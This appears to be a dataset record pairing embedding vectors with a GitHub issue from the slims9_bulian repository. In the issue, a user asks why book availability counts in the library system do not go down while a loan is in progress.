-0.0017759132897481322, -0.0019350836519151926, 0.013799543492496014, -0.006520623806864023, 0.0010238775284960866, -0.0043136985041201115, -0.0008486111182719469, -0.009771994315087795, 0.019114764407277107, 0.017912937328219414, -0.016110198572278023, -0.011059665121138096, 0.010301370173692703, -0.029730897396802902, 0.0033175419084727764, 0.01593850925564766, 0.0067209284752607346, -0.0115461191162467, -0.012282952666282654, -0.010809284634888172, -0.019257837906479836, 0.00869178120046854, -0.005780213046818972, 0.0025538813788443804, -0.016439270228147507, -0.01506575383245945, -0.01493698637932539, -0.011510349810123444, -0.009078082628548145, -0.0013511605793610215, 0.01157473400235176, 0.010966666974127293, -0.04586971178650856, 0.0031226028222590685, -0.013477625325322151, 0.002562823472544551, 0.010065296664834023, -0.010115372948348522, -0.012690715491771698, 0.005372450686991215, -0.021532723680138588, 0.01702587492763996, -0.0038487061392515898, 0.002573553938418627, -0.010623287409543991, 0.006220167502760887, -0.010930897668004036, 0.014021309092640877, -0.01968706212937832, 0.005147107876837254, 0.02375037968158722, -0.012547641061246395, 0.03419482335448265, 0.0017347793327644467, 0.0012080860324203968, 0.009564535692334175, 0.000561567721888423, 0.016238965094089508, -0.018656926229596138, -0.005948325619101524, -0.002153272507712245, 0.0007301274454221129, 0.0166538804769516, -0.01932937651872635, -0.0024841323029249907, -0.013956925831735134, -0.006806773133575916, -0.0000947310181800276, -0.009199695661664009, -0.008620243519544601, -0.0013180745299905539, 0.01326301321387291, 0.0037485540378838778, -0.005125646945089102, 0.005848173517733812, 0.020845966413617134, 0.01922922395169735, 0.0063346270471811295, -0.01728340983390808, 0.015008523128926754, -0.008849162608385086, 0.01666818931698799, -0.015437747351825237, -0.025338508188724518, -0.021275190636515617, -0.006184398662298918, 0.003795053344219923, 0.0036591324023902416, -0.015924200415611267, 0.0007752854144200683, 0.007912023924291134, -0.019357990473508835, 0.012526179663836956, -0.0005427891737781465, 0.01851385086774826, 0.002954490017145872, -0.025467274710536003, 0.011596194468438625, 0.016825571656227112, 0.00425646873190999, 0.025181125849485397, -0.02739878185093403, -0.0064347791485488415, -0.03611202538013458, -0.01641065441071987, 0.002909779315814376, -0.008262556977570057, -0.011610502377152443, -0.005880365148186684, -0.04260760918259621, -0.01477960404008627, 0.010716286487877369, 0.01138873677700758, 0.008927853778004646, 0.01764109544456005, 0.0023839802015572786, 0.0008231259416788816, -0.02400791458785534, 0.006030593533068895, 0.007100075948983431, 0.008477169089019299, -0.00564429210498929, 0.01193241961300373, 0.01706879772245884, -0.005308066960424185, -0.025681886821985245, 0.05265144631266594, 0.013377473689615726, 0.018013089895248413, 0.016424961388111115, 0.006824657320976257, 0.016210349276661873, -0.008784779347479343, -0.002600380452349782, -0.01400700118392706, 0.020702891051769257, -0.004285083618015051, -0.00786910206079483, 0.0051292236894369125, -0.006856849417090416, 0.004943226929754019, 0.007797564845532179, -0.004957534372806549, 0.003151217708364129, -0.026196956634521484, -0.02802831120789051, -0.01290532760322094, -0.0000955693467403762, 0.02200487069785595, -0.017040181905031204, 0.007861948572099209, 0.010659056715667248, -0.0069856164045631886, -0.0018277778290212154, 0.008505783975124359, 0.008162404410541058, 0.03742831200361252, -0.02273455075919628, -0.005815981887280941, 0.014722374267876148, 0.0009398211259394884, 0.0014808218693360686, 0.015466362237930298, 0.015909893438220024, 0.0036573440302163363, -0.014822526834905148, -0.0060091326013207436, 0.011510349810123444, -0.0024143834598362446, -0.005651446059346199, 0.0097648398950696, -0.004285083618015051, 0.009192542172968388, -0.004514003172516823, 0.0021872527431696653, 0.014471993781626225, 0.01408569235354662, 0.0027935311663895845, -0.009399999864399433, 0.010129679925739765, -0.002196194836869836, -0.019758598878979683, -0.0071501522324979305, 0.00866316631436348, -0.0031798325944691896, -0.026053881272673607, -0.003712785430252552, -0.012232876382768154, -0.017912937328219414, 0.003673439845442772, -0.013155708089470863, 0.0030045663006603718, 0.016467884182929993, 0.011317199096083641, -0.02045966498553753, 0.018313545733690262, 0.005061263218522072, 0.012261491268873215, -0.01056605763733387, 0.003061796072870493, -0.01917199417948723, -0.013849619776010513, 0.00866316631436348, -0.00433158315718174, 0.012626332230865955, 0.003600114258006215, 0.000057956382079282776, -0.015337594784796238, 0.0062523591332137585, -0.00909954309463501, -0.0007001712219789624, -0.01331308949738741, -0.008398477919399738, -0.020502587780356407, -0.005436833947896957, 0.024809133261442184, 0.006960578262805939, 0.010294215753674507, -0.016124505549669266, -0.011653424240648746, 0.014708067290484905, -0.003138698637485504, -0.008884931914508343, -0.011038203723728657, 0.00568006094545126, 0.01799878291785717, -0.004574809689074755, 0.017340639606118202, -0.020187823101878166, 0.0007650019251741469, 0.030532116070389748, -0.018542464822530746, -0.011939574033021927, -0.0005347412661649287, -0.01754094287753105, 0.007897716946899891, 0.004617732018232346, 0.011674885638058186, -0.01738356240093708, -0.002956278622150421, 0.029788127169013023, 0.006652968004345894, 0.002620053244754672, 0.010365753434598446, 0.00984353106468916, 0.008012176491320133, -0.011817960068583488, -0.00645266380161047, 0.03579726070165634, 0.015509285032749176, 0.021103501319885254, -0.0013511605793610215, 0.019515372812747955, 0.033965904265642166, -0.0015013888478279114, 0.012533333152532578, -0.00071492581628263, -0.016467884182929993, 0.02307792939245701, 0.01917199417948723, 0.010916590690612793, 0.013205783441662788, -0.019558295607566833, 0.015952816233038902, 0.022663014009594917, -0.006241628434509039, -0.006359665188938379, 0.0412340946495533, -0.0011320776538923383, 0.014500608667731285, -0.007625875063240528, 0.011503196321427822, 0.0008392218151129782, -0.011531811207532883, 0.004803729243576527, -0.03150502219796181, -0.0017714421264827251, 0.0058231353759765625, 0.011760730296373367, 0.0031959284096956253, 0.001420015236362815, -0.005250837188214064, 0.0270554032176733, 0.00633820379152894, -0.02376468852162361, 0.007654489949345589, -0.008205327205359936, -0.0031100837513804436, 0.000620138889644295, 0.011267122812569141, 0.007389802020043135, 0.0007220795378088951, 0.007278919219970703, -0.009800609201192856, 0.017211871221661568, 0.0014030251186341047, -0.01619604229927063, -0.007243150845170021, 0.007518569007515907, -0.019243530929088593, 0.010101065039634705, 0.016882801428437233, 0.012418873608112335, 0.003011720022186637, 0.005529832560569048, -0.00008299443288706243, 0.01496560126543045, 0.008419939316809177, -0.007157305721193552, 0.01496560126543045, 0.027184169739484787, -0.0016775494441390038, -0.010086758062243462, -0.00864170491695404, 0.0142716895788908, 0.004818036686629057, 0.006652968004345894, -0.016725419089198112, 0.015180213376879692, -0.0018072108505293727, 0.0065993149764835835, 0.02329254150390625, 0.010923744179308414, 0.00022120671928860247, 0.026468796655535698, -0.006202283315360546, -0.008527245372533798, -0.022033484652638435, -0.009485844522714615, 0.019858751446008682 ]
null
null
null
null
null
null
null
null
null
[ "slims", "slims9_bulian" ]
Hi, I like your project, and at the moment I only use the backend to handle book checkouts. I have this problem, both in bibliography and in item, if I search for an item I see how many I have in all, but if I have a loan in progress the quantity does not change. Is this correct or do I need to make some special settings?
Availability of books
https://api.github.com/repos/slims/slims9_bulian/issues/179/comments
1
2023-01-18T17:14:25
2023-01-26T15:08:57Z
https://github.com/slims/slims9_bulian/issues/179
1,538,374,945
179
false
This is a GitHub Issue repo:slims9_bulian owner:slims Title : Availability of books Issue date: --- start body --- Hi, I like your project, and at the moment I only use the backend to handle book checkouts. I have this problem, both in bibliography and in item, if I search for an item I see how many I have in all, but if I have a loan in progress the quantity does not change. Is this correct or do I need to make some special settings? --- end body ---
458
[ -0.03353723883628845, 0.043988682329654694, -0.017430102452635765, 0.024011867120862007, 0.003354964079335332, -0.03046133741736412, -0.00412600627169013, 0.04650232195854187, -0.01324621681123972, 0.040119003504514694, -0.014312859624624252, 0.006503214128315449, -0.04230190068483353, 0.018389254808425903, 0.004919786937534809, -0.004469151142984629, -0.0036526317708194256, 0.02090289257466793, 0.006379186175763607, -0.015437382273375988, -0.009475757367908955, 0.027600418776273727, 0.008987913839519024, 0.013072577305138111, -0.018273495137691498, 0.0014769696863368154, -0.04580776393413544, 0.003214398631826043, -0.0298494640737772, -0.00808250717818737, -0.02186204493045807, 0.008814273402094841, -0.006193143781274557, -0.001445962581783533, 0.002896059537306428, -0.016818229109048843, 0.014734555035829544, 0.007908867672085762, -0.011187347583472729, 0.0029642749577760696, -0.021961268037557602, -0.024458369240164757, -0.04084663465619087, 0.01657017320394516, -0.008839079178869724, -0.02014218643307686, -0.015916958451271057, -0.013080845586955547, -0.03252847492694855, -0.005101695191115141, -0.005705299321562052, -0.015950031578540802, 0.003764257300645113, -0.0013002294581383467, -0.015114909037947655, -0.023168476298451424, 0.0492805540561676, -0.007247383706271648, 0.01250204723328352, -0.055035464465618134, -0.018604235723614693, 0.00008223330951295793, 0.013800209388136864, 0.003913091029971838, -0.010848336853086948, 0.04484861344099045, -0.04269878938794136, 0.02822882868349552, -0.01933186873793602, 0.0579129196703434, 0.04835447669029236, 0.04663461819291115, 0.03760536387562752, 0.05649073049426079, 0.03241271525621414, -0.00276169553399086, 0.04316182807087898, -0.008987913839519024, -0.012229184620082378, 0.014982611872255802, -0.0276169553399086, 0.02695547230541706, -0.03800225257873535, -0.009988407604396343, 0.024607203900814056, -0.0074789030477404594, -0.03046133741736412, -0.08189171552658081, -0.002470229286700487, 0.034066423773765564, -0.004671730566769838, -0.05209186300635338, 0.0007064442033879459, -0.013940774835646152, 0.023565366864204407, 0.010228196159005165, 0.0032929498702287674, 0.02053907699882984, 0.01451957318931818, -0.03247886151075363, 0.005473779980093241, -0.043029531836509705, -0.03277653083205223, -0.043988682329654694, 0.0504712276160717, 0.015197593718767166, -0.006780210416764021, -0.03515787422657013, 0.007119221147149801, 0.058938220143318176, 0.03241271525621414, -0.024375684559345245, -0.038862183690071106, 0.00018423362052999437, -0.013130457140505314, 0.054837021976709366, 0.0006764706922695041, 0.050272781401872635, 0.03486020490527153, -0.045113205909729004, -0.023383459076285362, -0.005651553627103567, 0.005775582045316696, -0.018323106691241264, -0.016322117298841476, -0.01835617981851101, 0.016363458707928658, 0.005130635108798742, 0.012477241456508636, -0.006242754869163036, -0.013047771528363228, -0.0025508475955575705, -0.02149822935461998, -0.04590698704123497, 0.008181729353964329, 0.018422327935695648, 0.03796917945146561, 0.05506854131817818, -0.03813454881310463, -0.013494272716343403, -0.06459391117095947, -0.05328253284096718, 0.02283773384988308, 0.0168430358171463, -0.028278440237045288, 0.006796747911721468, -0.024971019476652145, 0.00014650836237706244, 0.0038738155271857977, 0.029171442613005638, -0.009715545922517776, -0.06965426355600357, 0.02859264425933361, 0.0049487268552184105, -0.004254168830811977, -0.000688356754835695, 0.007855121977627277, -0.021762821823358536, 0.02215971238911152, 0.016553636640310287, -0.01784352958202362, 0.01168346032500267, 0.019894130527973175, -0.017793918028473854, -0.021911656484007835, -0.00966593436896801, 0.006089786533266306, 0.02912183105945587, -0.027071231976151466, 0.022225860506296158, -0.03443023934960365, 0.003001483390107751, -0.028609180822968483, 0.009988407604396343, 0.027286212891340256, 0.005060352385044098, 0.050272781401872635, -0.030477873980998993, -0.010699503123760223, -0.003408709540963173, -0.021084802225232124, 0.019579924643039703, -0.023151937872171402, -0.03968903794884682, 0.02664126642048359, -0.017297806218266487, 0.013452930375933647, -0.010699503123760223, 0.014081340283155441, -0.009947065263986588, -0.018538087606430054, -0.0025963245425373316, 0.07077878713607788, -0.012617806904017925, -0.0027058827690780163, -0.011129467748105526, -0.041243527084589005, -0.03949059173464775, 0.01141886692494154, -0.01377540361136198, 0.009062330238521099, -0.01867038570344448, -0.010244732722640038, -0.039457518607378006, -0.01582600362598896, 0.06217949092388153, 0.0007483037188649178, 0.01414748840034008, 0.005118232220411301, -0.02290388196706772, 0.0007880961056798697, 0.0003315171634312719, -0.021630525588989258, 0.03135434165596962, -0.026459358632564545, 0.03462868556380272, 0.0011865368578583002, -0.004171483218669891, 0.008855616673827171, -0.006416394375264645, 0.0017219254514202476, -0.018918441608548164, 0.013320633210241795, 0.007995687425136566, -0.0017394961323589087, -0.014428619295358658, -0.008078373037278652, 0.03634854406118393, 0.00859102327376604, -0.034661758691072464, 0.027368899434804916, -0.007433426100760698, -0.009492294862866402, -0.0009209096897393465, -0.011179079301655293, 0.037274621427059174, -0.0240449421107769, -0.010029750876128674, -0.027153916656970978, -0.007681482471525669, -0.011021976359188557, 0.09406302124261856, -0.0005694963620044291, -0.03436409309506416, 0.020357169210910797, 0.0031937272287905216, 0.018240420147776604, 0.017744306474924088, 0.0120968883857131, 0.006209680810570717, 0.004051589407026768, -0.020869819447398186, 0.006036041304469109, -0.008161058649420738, 0.0014614661922678351, 0.013304096646606922, 0.04871829226613045, 0.05242260545492172, -0.034760981798172, -0.040350522845983505, 0.027898086234927177, -0.020026426762342453, -0.05718528851866722, 0.025500206276774406, 0.013874625787138939, -0.02247391827404499, 0.01896805316209793, -0.04547702148556709, 0.007755899336189032, 0.01618981920182705, 0.037142325192689896, -0.013345438987016678, -0.015553141944110394, 0.036613136529922485, -0.05539928376674652, -0.0032929498702287674, -0.012708760797977448, 0.024226849898695946, 0.018934978172183037, -0.019728759303689003, -0.014635332860052586, 0.0471968799829483, -0.01410614512860775, 0.02240777015686035, -0.011228689923882484, 0.026293987408280373, -0.0017798052867874503, -0.00046226358972489834, -0.013204873539507389, -0.015619290061295033, -0.01067469734698534, -0.046469248831272125, -0.01246070396155119, 0.004746147431433201, 0.014354201965034008, 0.0061393980868160725, -0.002755494089797139, 0.0025012362748384476, -0.007788973860442638, -0.021481690928339958, -0.012411093339323997, -0.020357169210910797, -0.012419361621141434, -0.004936323966830969, 0.010104167275130749, -0.009566712193191051, 0.046766918152570724, 0.017363954335451126, -0.03777073323726654, -0.01650402508676052, 0.02030755765736103, -0.06482543051242828, -0.004369928501546383, -0.07104337960481644, 0.01208861917257309, 0.01695052720606327, -0.006672719493508339, 0.008814273402094841, -0.02515292726457119, -0.02574826404452324, 0.010029750876128674, -0.00859102327376604, -0.03353723883628845, -0.019017664715647697, 0.00033797696232795715, -0.009343461133539677, -0.02523561380803585, 0.016289042308926582, -0.013750597834587097, 0.009789962321519852, -0.011220421642065048, 0.003596819005906582, -0.015379502438008785, -0.009756888262927532, -0.015950031578540802, -0.06651221215724945, -0.030362114310264587, 0.006618973799049854, 0.0005441739340312779, -0.015983106568455696, -0.004045387730002403, -0.0041756173595786095, 0.006069115363061428, 0.0323796384036541, 0.01526374276727438, -0.03621624782681465, -0.0289564598351717, -0.005750776268541813, 0.04875136911869049, -0.017413565889000893, 0.0010072126751765609, 0.007098549976944923, -0.013320633210241795, 0.004398868419229984, 0.03522402048110962, -0.0014562982833012938, -0.016628053039312363, -0.025797873735427856, 0.01048452127724886, 0.010046287439763546, -0.014023460447788239, -0.05473779886960983, -0.0001240282435901463, 0.044749390333890915, 0.04716380685567856, 0.01777738146483898, -0.009384803473949432, 0.01246070396155119, 0.011319644749164581, -0.04031744599342346, -0.03196621313691139, 0.025483669713139534, 0.012559927068650723, 0.008065969683229923, -0.03479405492544174, 0.01873653382062912, 0.012287064455449581, 0.03876296058297157, 0.026525506749749184, 0.00996360182762146, 0.02260621450841427, 0.019497239962220192, 0.010682965628802776, -0.00865717139095068, 0.007201906759291887, -0.01030261255800724, 0.03239617869257927, 0.013386781327426434, -0.017347417771816254, 0.010434909723699093, -0.023846497759222984, 0.003724981565028429, 0.00533734867349267, -0.04686613753437996, -0.018604235723614693, -0.021547840908169746, -0.018637310713529587, -0.007028267253190279, 0.020572151988744736, -0.03075900487601757, 0.03419872000813484, -0.03061017021536827, 0.05298486724495888, 0.021746285259723663, 0.010451446287333965, 0.01776084490120411, -0.0009224600507877767, -0.004431942477822304, -0.0076442742720246315, 0.03300805017352104, -0.06852973997592926, 0.02239123173058033, 0.017975827679038048, 0.03634854406118393, 0.0025508475955575705, 0.03902755305171013, -0.044451721012592316, 0.03275999426841736, -0.025847485288977623, -0.001313665765337646, -0.0035720134619623423, -0.022192787379026413, -0.008500069379806519, 0.012485509738326073, -0.022589677944779396, -0.014933000318706036, -0.018240420147776604, 0.01444515585899353, 0.03443023934960365, -0.023085789754986763, -0.01007109321653843, 0.02956833317875862, 0.033934127539396286, -0.01784352958202362, 0.02007603831589222, 0.02254006639122963, 0.023350384086370468, -0.03128819167613983, 0.016032718122005463, -0.01202247105538845, 0.005738373380154371, 0.012179573066532612, 0.003636094741523266, -0.016479218378663063, 0.030874764546751976, -0.060492709279060364, -0.03628239408135414, -0.02710430510342121, 0.023763811215758324, -0.0069786556996405125, -0.012361481785774231, 0.008264414966106415, -0.00448155403137207, -0.01984451897442341, 0.03156932070851326, -0.04121045023202896, 0.025037167593836784, -0.01896805316209793, 0.0353563167154789, 0.01661151647567749, -0.0510665625333786, 0.03403335064649582, -0.02014218643307686, -0.004233497194945812, -0.0016485421219840646, -0.01708282344043255, 0.008905228227376938, -0.02402840554714203, 0.008144521154463291, -0.0338679775595665, -0.015048759989440441, 0.014990880154073238, 0.007983285002410412, -0.0029539393726736307, 0.006321306340396404, 0.005378691479563713, -0.019348405301570892, 0.01618981920182705, 0.005754910409450531, 0.006577630992978811, -0.006945581641048193, -0.05242260545492172, -0.007549185771495104, 0.002199434209614992, -0.012411093339323997, -0.01303123403340578, -0.00009366716403746977, 0.02576480060815811, -0.023995330557227135, 0.008429786190390587, 0.0158921517431736, 0.005775582045316696, -0.014379007741808891, -0.02215971238911152, -0.00099325948394835, 0.0020640366710722446, -0.023995330557227135, -0.02530176192522049, 0.00896310806274414, 0.0262774508446455, 0.016363458707928658, 0.017413565889000893, -0.03322303295135498, -0.013825015164911747, 0.026889322325587273, -0.016148477792739868, 0.007842719554901123, -0.021316321566700935, -0.03396720066666603, 0.017066286876797676, 0.013767135329544544, -0.015371233224868774, -0.02156437747180462, -0.03915984928607941, -0.0001266121689695865, 0.007421023212373257, 0.014618795365095139, -0.036976952105760574, 0.0650569498538971, 0.00996360182762146, -0.015354696661233902, -0.01635519042611122, 0.007094415370374918, 0.015172788873314857, -0.023052716627717018, -0.003404575400054455, -0.0033384268172085285, -0.003960635047405958, -0.006337843369692564, -0.018422327935695648, -0.010360492393374443, 0.01414748840034008, -0.007516111712902784, 0.04283108562231064, 0.012568195350468159, 0.005849998909980059, 0.031155895441770554, 0.014833778142929077, -0.011509820818901062, -0.0072515178471803665, -0.0454108752310276, 0.027798863127827644, -0.03879603371024132, -0.00505621824413538, -0.00028216425562277436, 0.005304274614900351, 0.014089608564972878, 0.00811558123677969, 0.017860066145658493, -0.02209356427192688, -0.009732082486152649, -0.0016847170190885663, 0.019910667091608047, 0.0032681443262845278, -0.0021870313212275505, 0.021746285259723663, 0.005428302567452192, 0.00808250717818737, 0.02045639231801033, -0.013271021656692028, -0.007131624035537243, 0.013758866116404533, 0.009227701462805271, 0.006313037592917681, -0.006610705517232418, -0.0033466953318566084, -0.017446639016270638, -0.015147983096539974, -0.024507980793714523, -0.04686613753437996, 0.01767815835773945, 0.027120841667056084, 0.008698513731360435, -0.012179573066532612, -0.0045683737844228745, 0.030858226120471954, 0.020324094220995903, -0.003776659956201911, -0.008665439672768116, -0.00257565313950181, 0.0022697169333696365, -0.04081356152892113, -0.03223080560564995, -0.0069786556996405125, -0.017793918028473854, -0.010319150052964687, 0.004210758954286575, -0.01104678213596344, -0.035190947353839874, 0.022870808839797974, 0.012113424949347973, 0.048784442245960236, 0.00414254330098629, 0.013180067762732506, 0.00966593436896801, -0.009136747568845749, 0.003433515317738056, -0.0041508120484650135, 0.027071231976151466, -0.013667912222445011, -0.020026426762342453, -0.0009219432831741869, 0.01954685151576996, -0.01115427352488041, -0.03641469404101372, 0.00969900842756033, 0.004041253589093685, 0.029353350400924683, -0.019216109067201614, 0.03932522237300873, -0.025516744703054428, 0.010219926945865154, 0.01880268193781376, -0.022358158603310585, 0.005635016597807407, -0.03067631833255291, -0.00524226063862443, 0.038862183690071106, -0.003851077053695917, 0.02492140792310238, 0.012626075185835361, -0.007611199747771025, 0.029171442613005638, -0.014329396188259125, 0.012336676008999348, 0.01567717082798481, 0.0036588332150131464, -0.018753070384263992, 0.011005439795553684, 0.0023048582952469587, -0.020109113305807114, -0.03449638932943344, -0.02731928788125515, -0.03173469379544258, 0.016198089346289635, 0.020919431000947952, 0.02940296195447445, 0.0323796384036541, -0.00002391742600593716, -0.03254501149058342, -0.021150950342416763, -0.015412576496601105, -0.009756888262927532, 0.0789811834692955, -0.007772436365485191, 0.011030245572328568, 0.005176112055778503, 0.00200202246196568, 0.012559927068650723, -0.0029704764019697905, -0.02425992488861084, 0.00400404492393136, 0.03264423459768295, 0.01388289500027895, 0.010649891570210457, 0.002619063016027212, -0.023350384086370468, 0.025864023715257645, -0.0006635510944761336, -0.0015834271907806396, 0.00239787925966084, -0.012948548421263695, -0.010682965628802776, -0.053117163479328156, 0.01612367108464241, 0.013907700777053833, -0.001121422043070197, 0.014933000318706036, 0.018405791372060776, 0.022043952718377113, 0.03312380984425545, 0.007693885359913111, -0.001450096839107573, -0.01246070396155119, -0.024441832676529884, 0.008756393566727638, 0.014188830740749836, -0.000024854096409399062, -0.030477873980998993, -0.013973848894238472, -0.026922397315502167, -0.032296955585479736, 0.03127165511250496, -0.023102328181266785, -0.007503708824515343, 0.007491305936127901, -0.004365794360637665, 0.026260914281010628, -0.0022738510742783546, -0.017380490899086, 0.009608054533600807, -0.003266077022999525, 0.02321808785200119, 0.01388289500027895, 0.008235475048422813, -0.023863034322857857, -0.006606570910662413, 0.03241271525621414, 0.010534131899476051, 0.008896959014236927, -0.025285225361585617, 0.012650880962610245, -0.007772436365485191, -0.001329169375821948, 0.019315332174301147, 0.019083812832832336, 0.0021291514858603477, -0.00276996404863894, 0.030792078003287315, 0.021994341164827347, -0.02768310345709324, -0.009087136015295982, -0.02134939469397068, 0.014734555035829544, -0.008541411720216274, -0.00821066927164793, 0.011468478478491306, -0.01451957318931818, -0.027071231976151466, -0.006726465187966824, -0.013370244763791561, -0.023333847522735596, -0.009128478355705738, -0.012998159974813461, 0.006213814951479435, -0.006321306340396404, 0.01481724064797163, -0.0240449421107769, 0.026029394939541817, 0.015371233224868774, -0.029766777530312538, 0.03479405492544174, 0.02240777015686035, 0.013279290869832039, -0.024987556040287018, 0.034595612436532974, 0.018901905044913292, 0.0012588866520673037, 0.005812790244817734, 0.005271200556308031, 0.008516605943441391, -0.0055978079326450825, -0.0008893858757801354, 0.019811443984508514, -0.017281267791986465, 0.03581935539841652, -0.005754910409450531, 0.006627242546528578, 0.03241271525621414, 0.01867038570344448, 0.033024586737155914, 0.005052083637565374, 0.014577453024685383, -0.03449638932943344, 0.006581765599548817, 0.0015720579540356994, 0.024507980793714523, 0.00034986299579031765, -0.004278974607586861, 0.003309486899524927, -0.00763187138363719, 0.010162047110497952, 0.003230935661122203, 0.013610032387077808, 0.02045639231801033, 0.04180578514933586, -0.016322117298841476, -0.015611021779477596, 0.01693398877978325, -0.04679999127984047, -0.020704448223114014, 0.032726917415857315, -0.03836606815457344, 0.019133424386382103, -0.005622613709419966, -0.01994374208152294, 0.01186536904424429, -0.021630525588989258, -0.01767815835773945, -0.021531302481889725, -0.00392549391835928, -0.00533734867349267, -0.000009067950486496557, -0.015850810334086418, 0.010955828242003918, 0.004502225201576948, -0.007565722800791264, -0.0031503173522651196, 0.031536247581243515, -0.022358158603310585, -0.01567717082798481, 0.005874804686754942, -0.010815262794494629, -0.02158091403543949, 0.0742185041308403, -0.030725929886102676, 0.027650030329823494, -0.01421363651752472, -0.00017389793356414884, 0.0074830371886491776, 0.03753921389579773, -0.005891341716051102, 0.012675686739385128, -0.008814273402094841, -0.038266848772764206, 0.02874147891998291, 0.0041094692423939705, 0.01964607462286949, -0.026029394939541817, 0.023681126534938812, -0.006883567664772272, 0.021547840908169746, -0.007408620323985815, 0.008574485778808594, 0.023763811215758324, 0.006924910470843315, -0.007053072564303875, 0.012278796173632145, 0.027666566893458366, 0.011427135206758976, -0.0037993984296917915, 0.0037621899973601103, 0.0283611249178648, -0.04726302996277809, -0.0014966074377298355, -0.013122187927365303, -0.010418372228741646, 0.0016847170190885663, 0.03304112330079079, 0.046833064407110214, 0.00352860358543694, 0.02194473147392273, -0.016065791249275208, -0.002039231127128005, -0.007338337600231171, -0.003867614082992077, -0.004419539589434862, -0.014304590411484241, -0.028113069012761116, 0.0238961074501276, -0.03365299850702286, -0.008119715377688408, -0.0029601408168673515, -0.0038448756095021963, -0.004465016536414623, 0.006924910470843315, -0.015925226733088493, -0.024078017100691795, 0.01208861917257309, 0.044980909675359726, 0.02366458810865879, 0.029154906049370766, 0.026988545432686806, 0.024722963571548462, -0.0025508475955575705, -0.034595612436532974, -0.009393072687089443, 0.012642612680792809, -0.012378018349409103, 0.0015482859453186393, -0.0035451406147331, -0.0025570490397512913, 0.012758372351527214, -0.00902925617992878, 0.008987913839519024, -0.0018945314222946763, -0.006503214128315449, -0.07487998157739639, 0.011923248879611492, -0.0018883299781009555, -0.008194132708013058, 0.0017694695852696896, 0.022870808839797974, -0.02447490580379963, -0.0021870313212275505, 0.002811306854709983, -0.009864379651844501, 0.014775898307561874, -0.006308903452008963, -0.04689921438694, -0.028774552047252655, 0.012915474362671375, -0.0549362450838089, -0.03866373747587204, 0.018190808594226837, -0.019910667091608047, 0.004250034689903259, -0.01933186873793602, -0.003433515317738056, -0.01635519042611122, 0.018124660477042198, 0.02872494049370289, -0.019960278645157814, -0.0602942630648613, 0.00400404492393136, 0.014527841471135616, 0.006474274210631847, -0.0276169553399086, -0.018604235723614693, -0.014577453024685383, 0.00028552336152642965, 0.013651375658810139, -0.009269043803215027, -0.028576107695698738, -0.009533637203276157, 0.02897299826145172, 0.01747971400618553, 0.004837101325392723, 0.020555613562464714, 0.009748619981110096, -0.0015152116538956761, 0.004535299260169268, -0.00011246519716223702, -0.011807489208877087, 0.012741834856569767, -0.04961129650473595, -0.004952860996127129, 0.014453425072133541, 0.006627242546528578, 0.03939136862754822, 0.006176606751978397, -0.0065362886525690556, -0.023234624415636063, 0.031172432005405426, 0.013262753374874592, 0.006122861057519913, 0.003264009952545166, 0.02201087959110737, -0.005808656103909016, -0.019894130527973175, 0.0033715011086314917, 0.009624592028558254, 0.030560558661818504, 0.00955844298005104, -0.01590869016945362, -0.025318298488855362, -0.04203730449080467, -0.010327418334782124, -0.018571162596344948, -0.0341656468808651, 0.055564653128385544, -0.010352224111557007, 0.021828969940543175, -0.041243527084589005, -0.020720984786748886, -0.03469483554363251, -0.01441208180040121, -0.0028299111872911453, 0.025847485288977623, -0.006242754869163036, -0.015247205272316933, 0.004973532631993294, -0.018868830054998398, -0.008268549107015133, 0.02000989019870758, 0.03717539831995964, -0.03185045346617699, 0.017793918028473854, -0.01563582755625248, 0.002865052316337824, -0.01593349501490593, 0.008822542615234852, -0.016710739582777023, -0.011410598643124104, -0.027153916656970978, -0.008905228227376938, 0.012411093339323997, 0.019827982410788536, -0.027666566893458366, -0.012378018349409103, -0.00754091702401638, 0.0052215890027582645, 0.01048452127724886, 0.03014713153243065, -0.00496526388451457, 0.008946570567786694, -0.03813454881310463, -0.0045270309783518314, -0.013006428256630898, -0.00021071881928946823, 0.000018717282728175633, -0.02784847468137741, -0.004555970896035433, 0.025781337171792984, 0.03568705916404724, -0.013758866116404533, -0.003214398631826043, 0.003214398631826043, 0.010931022465229034, 0.014081340283155441, 0.018703458830714226, 0.022804658859968185, 0.017231658101081848, -0.03290882706642151, -0.0005839663208462298, 0.036083951592445374, 0.012270527891814709, -0.0050727552734315395, -0.02903914637863636, -0.0076029314659535885, -0.03757229074835777, -0.01918303407728672, 0.03988748416304588, -0.02621130272746086, 0.0034624552354216576, 0.019910667091608047, 0.008756393566727638, 0.00963286031037569, -0.021746285259723663, 0.037142325192689896, -0.0002883656707126647, -0.005085158161818981, 0.0039213597774505615, -0.005089292302727699, -0.043029531836509705, 0.010897948406636715, 0.0227054376155138, -0.005035546608269215, 0.014428619295358658, -0.009095404297113419, -0.010633355006575584, -0.003979239612817764, 0.01149328425526619, -0.00993052776902914, -0.002712084213271737, 0.002633532974869013, -0.016983600333333015, 0.020621763542294502, 0.014643601141870022, 0.003948232624679804, 0.005118232220411301, 0.00896310806274414, 0.012898936867713928, -0.02045639231801033, -0.0007782772299833596, -0.017430102452635765, -0.003501730738207698, -0.07329242676496506, -0.013312364928424358, -0.007255652453750372, 0.041905008256435394, 0.02014218643307686, -0.00028345620376057923, 0.025566354393959045, 0.002809239784255624, -0.00744582898914814, -0.00735487462952733, 0.010608549229800701, 0.007040670141577721, -0.004638656508177519, -0.003547207685187459, -0.0013911834685131907, 0.02597978338599205, -0.0158921517431736, 0.010972365736961365, -0.01880268193781376, 0.0021456885151565075, -0.01695052720606327, 0.015619290061295033, -0.0030593632254749537, 0.01078218873590231, -0.004899115767329931, -0.013816745951771736, -0.0009829237824305892, -0.012750103138387203, -0.018471939489245415, 0.035488612949848175, 0.016181550920009613, 0.01693398877978325, 0.005271200556308031, -0.011187347583472729, 0.017826993018388748, 0.018422327935695648, 0.024739500135183334, 0.004390599671751261, 0.0054076313972473145, 0.004043320659548044, -0.019497239962220192, 0.011096393689513206, 0.01411441434174776, 0.04134274646639824, -0.014428619295358658, 0.025649040937423706, 0.05510161444544792, -0.0034562537912279367, 0.016925720497965813, -0.023383459076285362, -0.0031151759903877974, -0.00781791377812624, -0.021217098459601402, -0.030047908425331116, -0.018852293491363525, -0.001608232851140201, 0.0010154811898246408, -0.013684449717402458, -0.026591654866933823, 0.011815757490694523, 0.07514458149671555, 0.02948564849793911, 0.003398373955860734, 0.0009229768184013665, 0.0008191032102331519, -0.0010924821253865957, 0.0019203706178814173, -0.00177257030736655, 0.01790967769920826, -0.017826993018388748, 0.01593349501490593, -0.0029167309403419495, 0.012253990396857262, -0.008239609189331532, -0.005043815355747938, -0.03502557426691055, 